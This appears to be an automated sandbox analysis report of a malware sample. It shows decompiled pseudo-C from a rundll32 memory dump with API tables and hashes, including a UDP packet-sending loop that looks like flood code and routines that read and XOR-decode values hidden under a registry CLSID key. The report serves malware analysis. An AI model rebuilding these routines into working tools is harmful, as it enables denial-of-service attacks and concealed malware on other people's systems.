                                                                                              					_t38 =  *((intOrPtr*)( *__ecx + 0x2c))();
                                                                                              					_t85 = _t38;
                                                                                              					if(_t38 == 0) {
                                                                                              						 *(__ecx + 0x174) = 0;
                                                                                              						goto L12;
                                                                                              					} else {
                                                                                              						 *((intOrPtr*)(__ecx + 0x54)) = 2;
                                                                                              						 *(__ecx + 0x174) = 0;
                                                                                              						E04272750(__ecx, _t85);
                                                                                              						E04273350(__ebx, _t77, _t77, _t80);
                                                                                              						_t68 = _t77;
                                                                                              						E042733C0(__ebx, _t68, _t77, _t80);
                                                                                              						if( *((intOrPtr*)(_t77 + 0x23c)) != 0) {
                                                                                              							_push(0x80004005);
                                                                                              							E04257AC0();
                                                                                              							goto L14;
                                                                                              						} else {
                                                                                              							_t69 = _t77 + 0x178;
                                                                                              							if( *((intOrPtr*)(_t77 + 0x17c)) != 0) {
                                                                                              								E04260410(_t69, _t80);
                                                                                              							}
                                                                                              							 *((intOrPtr*)( *_t77 + 0xf4))();
                                                                                              							E04274CF0(_t77 + 0x2b4, _t77);
                                                                                              							_t68 = _t77 + 0x378;
                                                                                              							E04275860(_t68,  *((intOrPtr*)(_t77 + 0x1c)), 1);
                                                                                              							if( *((intOrPtr*)(_t77 + 0x37c)) != 0) {
                                                                                              								L14:
                                                                                              								_push(0x80004005);
                                                                                              								E04257AC0();
                                                                                              								asm("int3");
                                                                                              								asm("int3");
                                                                                              								asm("int3");
                                                                                              								asm("int3");
                                                                                              								asm("int3");
                                                                                              								asm("int3");
                                                                                              								_push(_t80);
                                                                                              								_t81 = _t68;
                                                                                              								_t44 =  *(_t81 + 0x84);
                                                                                              								__eflags = _t44;
                                                                                              								if(_t44 != 0) {
                                                                                              									HeapDestroy(_t44);
                                                                                              								}
                                                                                              								 *(_t81 + 0x84) = HeapCreate( *(_t81 + 0x88),  *(_t81 + 0x8c),  *(_t81 + 0x90));
                                                                                              								asm("xorps xmm0, xmm0");
                                                                                              								asm("movups [esi+0x5c], xmm0");
                                                                                              								asm("movq [esi+0x6c], xmm0");
                                                                                              								 *(_t81 + 0x74) = 0;
                                                                                              								 *(_t81 + 0x40) = 0;
                                                                                              								 *(_t81 + 0x44) = 0;
                                                                                              								 *((intOrPtr*)(_t81 + 0x54)) = 3;
                                                                                              								return SetEvent( *(_t81 + 0x3c));
                                                                                              							} else {
                                                                                              								E042604A0(_t62, _t77 + 0xb0);
                                                                                              								_t53 =  *(_t77 + 0x94);
                                                                                              								if(_t53 != 0) {
                                                                                              									HeapDestroy(_t53);
                                                                                              								}
                                                                                              								 *(_t77 + 0x94) = HeapCreate( *(_t77 + 0x98),  *(_t77 + 0x9c),  *(_t77 + 0xa0));
                                                                                              								_t55 =  *(_t77 + 0x50);
                                                                                              								if(_t55 != 0) {
                                                                                              									CloseHandle(_t55);
                                                                                              									 *(_t77 + 0x50) = 0;
                                                                                              								}
                                                                                              								 *((intOrPtr*)( *_t77 + 0x120))();
                                                                                              								return 1;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}













                                                                                              0x042725a0
                                                                                              0x042725a2
                                                                                              0x042725a8
                                                                                              0x042726af
                                                                                              0x042726b4
                                                                                              0x042726bb
                                                                                              0x042726c2
                                                                                              0x042726c5
                                                                                              0x042725ae
                                                                                              0x042725b4
                                                                                              0x042725bd
                                                                                              0x042725c0
                                                                                              0x042725c2
                                                                                              0x042726a5
                                                                                              0x00000000
                                                                                              0x042725c8
                                                                                              0x042725c8
                                                                                              0x042725d1
                                                                                              0x042725db
                                                                                              0x042725e2
                                                                                              0x042725e7
                                                                                              0x042725e9
                                                                                              0x042725f5
                                                                                              0x042726c6
                                                                                              0x042726cb
                                                                                              0x00000000
                                                                                              0x042725fb
                                                                                              0x04272602
                                                                                              0x04272608
                                                                                              0x0427260a
                                                                                              0x0427260a
                                                                                              0x04272613
                                                                                              0x0427261f
                                                                                              0x04272627
                                                                                              0x0427262f
                                                                                              0x0427263e
                                                                                              0x042726d0
                                                                                              0x042726d0
                                                                                              0x042726d5
                                                                                              0x042726da
                                                                                              0x042726db
                                                                                              0x042726dc
                                                                                              0x042726dd
                                                                                              0x042726de
                                                                                              0x042726df
                                                                                              0x042726e0
                                                                                              0x042726e1
                                                                                              0x042726e3
                                                                                              0x042726e9
                                                                                              0x042726eb
                                                                                              0x042726ee
                                                                                              0x042726ee
                                                                                              0x0427270c
                                                                                              0x04272712
                                                                                              0x04272715
                                                                                              0x04272719
                                                                                              0x0427271e
                                                                                              0x04272728
                                                                                              0x0427272f
                                                                                              0x04272736
                                                                                              0x04272744
                                                                                              0x04272644
                                                                                              0x0427264a
                                                                                              0x0427264f
                                                                                              0x04272657
                                                                                              0x0427265a
                                                                                              0x0427265a
                                                                                              0x04272678
                                                                                              0x0427267e
                                                                                              0x04272683
                                                                                              0x04272686
                                                                                              0x0427268c
                                                                                              0x0427268c
                                                                                              0x04272697
                                                                                              0x042726a4
                                                                                              0x042726a4
                                                                                              0x0427263e
                                                                                              0x042725f5
                                                                                              0x042725c2

                                                                                              APIs
                                                                                              • SetLastError.KERNEL32(0000139F,?,00000000,0425F8B6), ref: 042726BB
                                                                                                • Part of subcall function 0426EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0426ECA5
                                                                                                • Part of subcall function 0426EC90: SwitchToThread.KERNEL32(?,?,00000000,0426E712,?,00000000,04258425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,042587F8), ref: 0426ECBD
                                                                                              • HeapDestroy.KERNEL32(?), ref: 0427265A
                                                                                              • HeapCreate.KERNEL32(?,?,?), ref: 04272672
                                                                                              • CloseHandle.KERNEL32(?), ref: 04272686
                                                                                              • HeapDestroy.KERNEL32(?,00000000,80004005,80004005), ref: 042726EE
                                                                                              • HeapCreate.KERNEL32(?,?,?,00000000,80004005,80004005), ref: 04272706
                                                                                              • SetEvent.KERNEL32(80004005), ref: 0427273D
                                                                                                • Part of subcall function 042733C0: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 042733F9
                                                                                                • Part of subcall function 042733C0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF), ref: 0427344C
                                                                                                • Part of subcall function 042733C0: CloseHandle.KERNEL32(?,?,00000001,000000FF), ref: 04273463
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$CloseCreateDestroyHandle$CompareCompletionErrorEventExchangeInterlockedLastMultipleObjectsPostQueuedStatusSwitchThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 1858100233-0
                                                                                              • Opcode ID: e81674d6073cd12d934076890e991beb2c36c6417e701e95e00ff0af3c60e22d
                                                                                              • Instruction ID: cdff0ee1c5be8c7e6a93913f87e993e0cb9ca24ea174a91fe83dbb6d9e148ccc
                                                                                              • Opcode Fuzzy Hash: e81674d6073cd12d934076890e991beb2c36c6417e701e95e00ff0af3c60e22d
                                                                                              • Instruction Fuzzy Hash: EC416D31320A02EFE728EF35D848BA6F7A5FF44308F044219E51A82651DF74B8A5DB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E04253EF0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v20;
                                                                                              				signed int _v22;
                                                                                              				char _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				signed int _v36;
                                                                                              				signed int _t47;
                                                                                              				signed int _t51;
                                                                                              				long _t56;
                                                                                              				intOrPtr _t57;
                                                                                              				intOrPtr _t66;
                                                                                              				struct _CRITICAL_SECTION* _t78;
                                                                                              				intOrPtr _t81;
                                                                                              				signed int _t82;
                                                                                              
                                                                                              				_t47 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t47 ^ _t82;
                                                                                              				_t81 = _a4;
                                                                                              				_v24 = 2;
                                                                                              				_t67 =  *((intOrPtr*)(_t81 + 4));
                                                                                              				_v20 =  *((intOrPtr*)(_t67 + 0xc));
                                                                                              				_t51 =  *(_t67 + 0x10) & 0x0000ffff;
                                                                                              				__imp__#9(_t51);
                                                                                              				_v22 = _t51;
                                                                                              				__imp__#23(2, 2, 0);
                                                                                              				_t65 = _t51;
                                                                                              				_v36 = _t51;
                                                                                              				if( *((char*)(_t81 + 1)) != 0) {
                                                                                              					do {
                                                                                              						_v32 = 0;
                                                                                              						if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 0x24)) > 0) {
                                                                                              							do {
                                                                                              								_t66 =  *((intOrPtr*)(_t81 + 4));
                                                                                              								if( *((short*)(_t66 + 0x16)) != 3) {
                                                                                              									_t57 =  *((intOrPtr*)(_t66 + 0x1c));
                                                                                              									_v28 = _t57;
                                                                                              									if(_t57 !=  *((intOrPtr*)(_t66 + 0x18))) {
                                                                                              										_t79 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                              										_t57 =  *((intOrPtr*)(_t66 + 0x18)) + E0427EF46(_t67) % ( *((intOrPtr*)(_t66 + 0x1c)) - _t79 + 1);
                                                                                              										goto L7;
                                                                                              									}
                                                                                              								} else {
                                                                                              									_t57 =  *((intOrPtr*)(_t66 + 0x34));
                                                                                              									L7:
                                                                                              									_v28 = _t57;
                                                                                              								}
                                                                                              								_t67 =  &_v24;
                                                                                              								_t65 = _v36;
                                                                                              								__imp__#20(_v36,  *((intOrPtr*)(_t66 + 0x3c)), _t57, 0,  &_v24, 0x10);
                                                                                              								if(_t57 != 0xffffffff) {
                                                                                              									goto L9;
                                                                                              								}
                                                                                              								goto L12;
                                                                                              								L9:
                                                                                              								if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 8)) != 0) {
                                                                                              									_t78 = _t81 + 0x3c;
                                                                                              									EnterCriticalSection(_t78);
                                                                                              									asm("cdq");
                                                                                              									 *((intOrPtr*)(_t81 + 0x18)) =  *((intOrPtr*)(_t81 + 0x18)) + _v28 + 0x2e;
                                                                                              									asm("adc [esi+0x1c], edx");
                                                                                              									 *((intOrPtr*)(_t81 + 0x10)) =  *((intOrPtr*)(_t81 + 0x10)) + 1;
                                                                                              									asm("adc dword [esi+0x14], 0x0");
                                                                                              									LeaveCriticalSection(_t78);
                                                                                              								}
                                                                                              								_t67 = _v32 + 1;
                                                                                              								_v32 = _t67;
                                                                                              							} while (_t67 <  *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 0x24)));
                                                                                              						}
                                                                                              						L12:
                                                                                              						_t56 =  *( *((intOrPtr*)(_t81 + 4)) + 0x28);
                                                                                              						if(_t56 != 0) {
                                                                                              							Sleep(_t56);
                                                                                              						}
                                                                                              					} while ( *((char*)(_t81 + 1)) != 0);
                                                                                              				}
                                                                                              				__imp__#3();
                                                                                              				return E04275AFE(_v8 ^ _t82, _t65);
                                                                                              			}


















                                                                                              0x04253ef6
                                                                                              0x04253efd
                                                                                              0x04253f02
                                                                                              0x04253f0a
                                                                                              0x04253f0e
                                                                                              0x04253f14
                                                                                              0x04253f17
                                                                                              0x04253f1c
                                                                                              0x04253f28
                                                                                              0x04253f2c
                                                                                              0x04253f36
                                                                                              0x04253f38
                                                                                              0x04253f3b
                                                                                              0x04253f42
                                                                                              0x04253f45
                                                                                              0x04253f50
                                                                                              0x04253f56
                                                                                              0x04253f56
                                                                                              0x04253f5e
                                                                                              0x04253f65
                                                                                              0x04253f68
                                                                                              0x04253f6e
                                                                                              0x04253f70
                                                                                              0x04253f82
                                                                                              0x00000000
                                                                                              0x04253f82
                                                                                              0x04253f60
                                                                                              0x04253f60
                                                                                              0x04253f85
                                                                                              0x04253f85
                                                                                              0x04253f85
                                                                                              0x04253f8a
                                                                                              0x04253f94
                                                                                              0x04253f98
                                                                                              0x04253fa1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04253fa3
                                                                                              0x04253faa
                                                                                              0x04253fac
                                                                                              0x04253fb0
                                                                                              0x04253fbc
                                                                                              0x04253fbd
                                                                                              0x04253fc1
                                                                                              0x04253fc4
                                                                                              0x04253fc8
                                                                                              0x04253fcc
                                                                                              0x04253fcc
                                                                                              0x04253fd8
                                                                                              0x04253fd9
                                                                                              0x04253fdc
                                                                                              0x04253f56
                                                                                              0x04253fe5
                                                                                              0x04253fe8
                                                                                              0x04253fed
                                                                                              0x04253ff0
                                                                                              0x04253ff0
                                                                                              0x04253ff6
                                                                                              0x04254000
                                                                                              0x04254002
                                                                                              0x04254019

                                                                                              APIs
                                                                                              • htons.WS2_32(?), ref: 04253F1C
                                                                                              • socket.WS2_32(00000002,00000002,00000000), ref: 04253F2C
                                                                                              • sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 04253F98
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 04253FB0
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 04253FCC
                                                                                              • Sleep.KERNEL32(?), ref: 04253FF0
                                                                                              • closesocket.WS2_32(00000000), ref: 04254002
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeaveSleepclosesockethtonssendtosocket
                                                                                              • String ID:
                                                                                              • API String ID: 920770778-0
                                                                                              • Opcode ID: 22fcfb18b4294a39213c4c363ae00787a5cd6a18e04af88444c0b0c433683cd1
                                                                                              • Instruction ID: f6633bbf74a1fc077cd8c0ce02583db7040bfd885b0accabf3ee786a7a4537c9
                                                                                              • Opcode Fuzzy Hash: 22fcfb18b4294a39213c4c363ae00787a5cd6a18e04af88444c0b0c433683cd1
                                                                                              • Instruction Fuzzy Hash: AB418670A042059FDB24DFA8D888B6AB7F5FF08310F108559E8069B291DBB8FD81CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E0426AE80(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				int _v616;
                                                                                              				int _v620;
                                                                                              				signed int _t25;
                                                                                              				int _t52;
                                                                                              				void* _t55;
                                                                                              				void* _t56;
                                                                                              				char* _t64;
                                                                                              				signed int _t65;
                                                                                              
                                                                                              				_t60 = __edi;
                                                                                              				_t25 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t25 ^ _t65;
                                                                                              				_t64 = __ecx;
                                                                                              				E0427DEA0(__edi, __ecx, 0, 0x190);
                                                                                              				_v616 = 0x190;
                                                                                              				E04266050(__ebx, L"Global",  &_v88, _t60, _t64);
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				E0427DEA0(0, _t64, 0, _v616);
                                                                                              				_v612 = 0;
                                                                                              				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                                                              					L8:
                                                                                              					return E04275AFE(_v8 ^ _t65);
                                                                                              				} else {
                                                                                              					RegQueryValueExW(_v612, "3", 0,  &_v620, _t64,  &_v616);
                                                                                              					_t62 =  ==  ? 1 : 0;
                                                                                              					RegCloseKey(_v612);
                                                                                              					_t71 =  ==  ? 1 : 0;
                                                                                              					if(( ==  ? 1 : 0) == 0) {
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						_t52 = _v616;
                                                                                              						if(_t52 > 1) {
                                                                                              							_t55 = _t52 - 1;
                                                                                              							 *(_t55 + _t64) =  *(_t55 + _t64) ^  *_t64;
                                                                                              							_t56 = _t55 - 1;
                                                                                              							while(_t56 != 0) {
                                                                                              								 *(_t56 + _t64) =  *(_t56 + _t64) ^  *(_t56 +  &(_t64[1]));
                                                                                              								_t56 = _t56 - 1;
                                                                                              							}
                                                                                              							 *(_t56 + _t64) =  *(_t56 + _t64) ^ (_t56 + _t64)[0];
                                                                                              						}
                                                                                              						return E04275AFE(_v8 ^ _t65);
                                                                                              					}
                                                                                              				}
                                                                                              			}















                                                                                              0x0426ae80
                                                                                              0x0426ae89
                                                                                              0x0426ae90
                                                                                              0x0426ae9b
                                                                                              0x0426aea0
                                                                                              0x0426aea8
                                                                                              0x0426aeb7
                                                                                              0x0426aecc
                                                                                              0x0426aedc
                                                                                              0x0426aee4
                                                                                              0x0426af0b
                                                                                              0x0426af86
                                                                                              0x0426af98
                                                                                              0x0426af0d
                                                                                              0x0426af28
                                                                                              0x0426af3b
                                                                                              0x0426af3e
                                                                                              0x0426af44
                                                                                              0x0426af46
                                                                                              0x00000000
                                                                                              0x0426af48
                                                                                              0x0426af48
                                                                                              0x0426af50
                                                                                              0x0426af54
                                                                                              0x0426af55
                                                                                              0x0426af58
                                                                                              0x0426af5a
                                                                                              0x0426af64
                                                                                              0x0426af67
                                                                                              0x0426af67
                                                                                              0x0426af71
                                                                                              0x0426af71
                                                                                              0x0426af85
                                                                                              0x0426af85
                                                                                              0x0426af46

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 0426AECC
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0426AF03
                                                                                              • RegQueryValueExW.ADVAPI32(?,0429E120,00000000,?,?,?), ref: 0426AF28
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0426AF3E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue$wsprintf
                                                                                              • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 3615287298-1865207932
                                                                                              • Opcode ID: 294b7aa3df146c9b683082f50b35a0f62e6d1ddf2f6a129b1484e1d0bfae21c6
                                                                                              • Instruction ID: e640bd4a08ac9a233b22c6a757f443d233626196b42e7c0275c54bc658f33f05
                                                                                              • Opcode Fuzzy Hash: 294b7aa3df146c9b683082f50b35a0f62e6d1ddf2f6a129b1484e1d0bfae21c6
                                                                                              • Instruction Fuzzy Hash: C3310A71719219ABDB20EF74DC48EEEBBBCEF89304F5001EDE50A9A102D672AD45CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E0426AFA0(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				int _v616;
                                                                                              				int _v620;
                                                                                              				signed int _t25;
                                                                                              				int _t52;
                                                                                              				void* _t55;
                                                                                              				void* _t56;
                                                                                              				char* _t64;
                                                                                              				signed int _t65;
                                                                                              
                                                                                              				_t60 = __edi;
                                                                                              				_t25 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t25 ^ _t65;
                                                                                              				_t64 = __ecx;
                                                                                              				E0427DEA0(__edi, __ecx, 0, 0x190);
                                                                                              				_v616 = 0x190;
                                                                                              				E04266050(__ebx, L"Global",  &_v88, _t60, _t64);
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				E0427DEA0(0, _t64, 0, _v616);
                                                                                              				_v612 = 0;
                                                                                              				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                                                              					L8:
                                                                                              					return E04275AFE(_v8 ^ _t65);
                                                                                              				} else {
                                                                                              					RegQueryValueExW(_v612, "2", 0,  &_v620, _t64,  &_v616);
                                                                                              					_t62 =  ==  ? 1 : 0;
                                                                                              					RegCloseKey(_v612);
                                                                                              					_t71 =  ==  ? 1 : 0;
                                                                                              					if(( ==  ? 1 : 0) == 0) {
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						_t52 = _v616;
                                                                                              						if(_t52 > 1) {
                                                                                              							_t55 = _t52 - 1;
                                                                                              							 *(_t55 + _t64) =  *(_t55 + _t64) ^  *_t64;
                                                                                              							_t56 = _t55 - 1;
                                                                                              							while(_t56 != 0) {
                                                                                              								 *(_t56 + _t64) =  *(_t56 + _t64) ^  *(_t56 +  &(_t64[1]));
                                                                                              								_t56 = _t56 - 1;
                                                                                              							}
                                                                                              							 *(_t56 + _t64) =  *(_t56 + _t64) ^ (_t56 + _t64)[0];
                                                                                              						}
                                                                                              						return E04275AFE(_v8 ^ _t65);
                                                                                              					}
                                                                                              				}
                                                                                              			}















                                                                                              0x0426afa0
                                                                                              0x0426afa9
                                                                                              0x0426afb0
                                                                                              0x0426afbb
                                                                                              0x0426afc0
                                                                                              0x0426afc8
                                                                                              0x0426afd7
                                                                                              0x0426afec
                                                                                              0x0426affc
                                                                                              0x0426b004
                                                                                              0x0426b02b
                                                                                              0x0426b0a6
                                                                                              0x0426b0b8
                                                                                              0x0426b02d
                                                                                              0x0426b048
                                                                                              0x0426b05b
                                                                                              0x0426b05e
                                                                                              0x0426b064
                                                                                              0x0426b066
                                                                                              0x00000000
                                                                                              0x0426b068
                                                                                              0x0426b068
                                                                                              0x0426b070
                                                                                              0x0426b074
                                                                                              0x0426b075
                                                                                              0x0426b078
                                                                                              0x0426b07a
                                                                                              0x0426b084
                                                                                              0x0426b087
                                                                                              0x0426b087
                                                                                              0x0426b091
                                                                                              0x0426b091
                                                                                              0x0426b0a5
                                                                                              0x0426b0a5
                                                                                              0x0426b066

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 0426AFEC
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0426B023
                                                                                              • RegQueryValueExW.ADVAPI32(?,0429E124,00000000,?,?,?), ref: 0426B048
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0426B05E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue$wsprintf
                                                                                              • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 3615287298-1865207932
                                                                                              • Opcode ID: 3b21fc9f4227c98ece1bee670d4a89fb7378ae611f1156ae9b4565c19cd26903
                                                                                              • Instruction ID: 2c90787e6996fa962b3d70d3552ec8875543820cb5fc347ca6b37a47534a7a56
                                                                                              • Opcode Fuzzy Hash: 3b21fc9f4227c98ece1bee670d4a89fb7378ae611f1156ae9b4565c19cd26903
                                                                                              • Instruction Fuzzy Hash: AA31D831719259ABDB20EF74DC88EEEBBBDEF89304F5001EDD50A9A102D6326E45CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 63%
                                                                                              			E04261A30(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				signed int _v12;
                                                                                              				void* _v84;
                                                                                              				char _v88;
                                                                                              				intOrPtr _v92;
                                                                                              				char _v96;
                                                                                              				signed int _t29;
                                                                                              				intOrPtr _t31;
                                                                                              				void* _t32;
                                                                                              				struct HICON__* _t34;
                                                                                              				void* _t35;
                                                                                              				intOrPtr _t36;
                                                                                              				intOrPtr _t39;
                                                                                              				intOrPtr* _t45;
                                                                                              				struct HICON__** _t51;
                                                                                              				signed int _t53;
                                                                                              				signed int _t55;
                                                                                              
                                                                                              				_t29 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t29 ^ _t55;
                                                                                              				_t31 = _a4;
                                                                                              				_t45 = __ecx;
                                                                                              				 *__ecx = 0x429e8b0;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) = _t31;
                                                                                              				 *((intOrPtr*)(_t31 + 0x38)) = __ecx;
                                                                                              				_t32 = CreateEventW(0, 1, 0, 0);
                                                                                              				asm("movaps xmm0, [0x429f950]");
                                                                                              				_t51 = _t45 + 0x70;
                                                                                              				asm("movups [ebp-0x4c], xmm0");
                                                                                              				_t53 = 0;
                                                                                              				 *(_t45 + 8) = _t32;
                                                                                              				asm("movaps xmm0, [0x429f940]");
                                                                                              				asm("movups [ebp-0x3c], xmm0");
                                                                                              				 *_t45 = 0x429eca4;
                                                                                              				asm("movaps xmm0, [0x429f930]");
                                                                                              				asm("movups [ebp-0x2c], xmm0");
                                                                                              				 *((intOrPtr*)(_t45 + 0x2c)) = 0x429ec9c;
                                                                                              				asm("movaps xmm0, [0x429f920]");
                                                                                              				asm("movups [ebp-0x1c], xmm0");
                                                                                              				do {
                                                                                              					 *(_t51 - 0x40) =  *(_t55 + _t53 * 4 - 0x4c);
                                                                                              					_t34 = LoadCursorW(0,  *(_t55 + _t53 * 4 - 0x4c));
                                                                                              					_t53 = _t53 + 1;
                                                                                              					 *_t51 = _t34;
                                                                                              					_t51 =  &(_t51[1]);
                                                                                              					_t58 = _t53 - 0x10;
                                                                                              				} while (_t53 < 0x10);
                                                                                              				 *((char*)(_t45 + 0x18)) = 2;
                                                                                              				 *((intOrPtr*)(_t45 + 0x20)) = 0x20;
                                                                                              				_t35 = E04275B14(_t53, _t58, 0x108);
                                                                                              				_push(0);
                                                                                              				_t36 = E042623F0(_t45, _t35, _t51, _t53);
                                                                                              				asm("movsd xmm0, [0x429f918]");
                                                                                              				 *((intOrPtr*)(_t45 + 0xb0)) = _t36;
                                                                                              				 *((char*)(_t45 + 0xc)) = 1;
                                                                                              				 *(_t45 + 0x14) = 0;
                                                                                              				 *(_t45 + 0x10) = 0;
                                                                                              				 *(_t45 + 0x1c) = 0;
                                                                                              				asm("movsd [ebx+0xb8], xmm0");
                                                                                              				_v96 = E04262050;
                                                                                              				_v92 = _t45;
                                                                                              				_v88 = 1;
                                                                                              				_v84 = CreateEventW(0, 0, 0, 0);
                                                                                              				_t39 = E0427F897(_t35, 0, 0, E04265400,  &_v96, 0, 0);
                                                                                              				WaitForSingleObject(_v84, 0xffffffff);
                                                                                              				CloseHandle(_v84);
                                                                                              				 *((intOrPtr*)(_t45 + 0x24)) = _t39;
                                                                                              				return E04275AFE(_v12 ^ _t55, 0x20);
                                                                                              			}



















                                                                                              0x04261a36
                                                                                              0x04261a3d
                                                                                              0x04261a40
                                                                                              0x04261a48
                                                                                              0x04261a50
                                                                                              0x04261a56
                                                                                              0x04261a59
                                                                                              0x04261a5c
                                                                                              0x04261a62
                                                                                              0x04261a69
                                                                                              0x04261a6c
                                                                                              0x04261a70
                                                                                              0x04261a72
                                                                                              0x04261a75
                                                                                              0x04261a7c
                                                                                              0x04261a80
                                                                                              0x04261a86
                                                                                              0x04261a8d
                                                                                              0x04261a91
                                                                                              0x04261a98
                                                                                              0x04261a9f
                                                                                              0x04261aa3
                                                                                              0x04261aaa
                                                                                              0x04261aad
                                                                                              0x04261ab3
                                                                                              0x04261ab4
                                                                                              0x04261ab6
                                                                                              0x04261ab9
                                                                                              0x04261ab9
                                                                                              0x04261ac3
                                                                                              0x04261ac7
                                                                                              0x04261ace
                                                                                              0x04261ad3
                                                                                              0x04261ad9
                                                                                              0x04261ade
                                                                                              0x04261aee
                                                                                              0x04261af4
                                                                                              0x04261af8
                                                                                              0x04261aff
                                                                                              0x04261b06
                                                                                              0x04261b0d
                                                                                              0x04261b15
                                                                                              0x04261b1c
                                                                                              0x04261b1f
                                                                                              0x04261b2d
                                                                                              0x04261b3d
                                                                                              0x04261b4c
                                                                                              0x04261b55
                                                                                              0x04261b61
                                                                                              0x04261b70

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04261A5C
                                                                                              • LoadCursorW.USER32(00000000,?), ref: 04261AAD
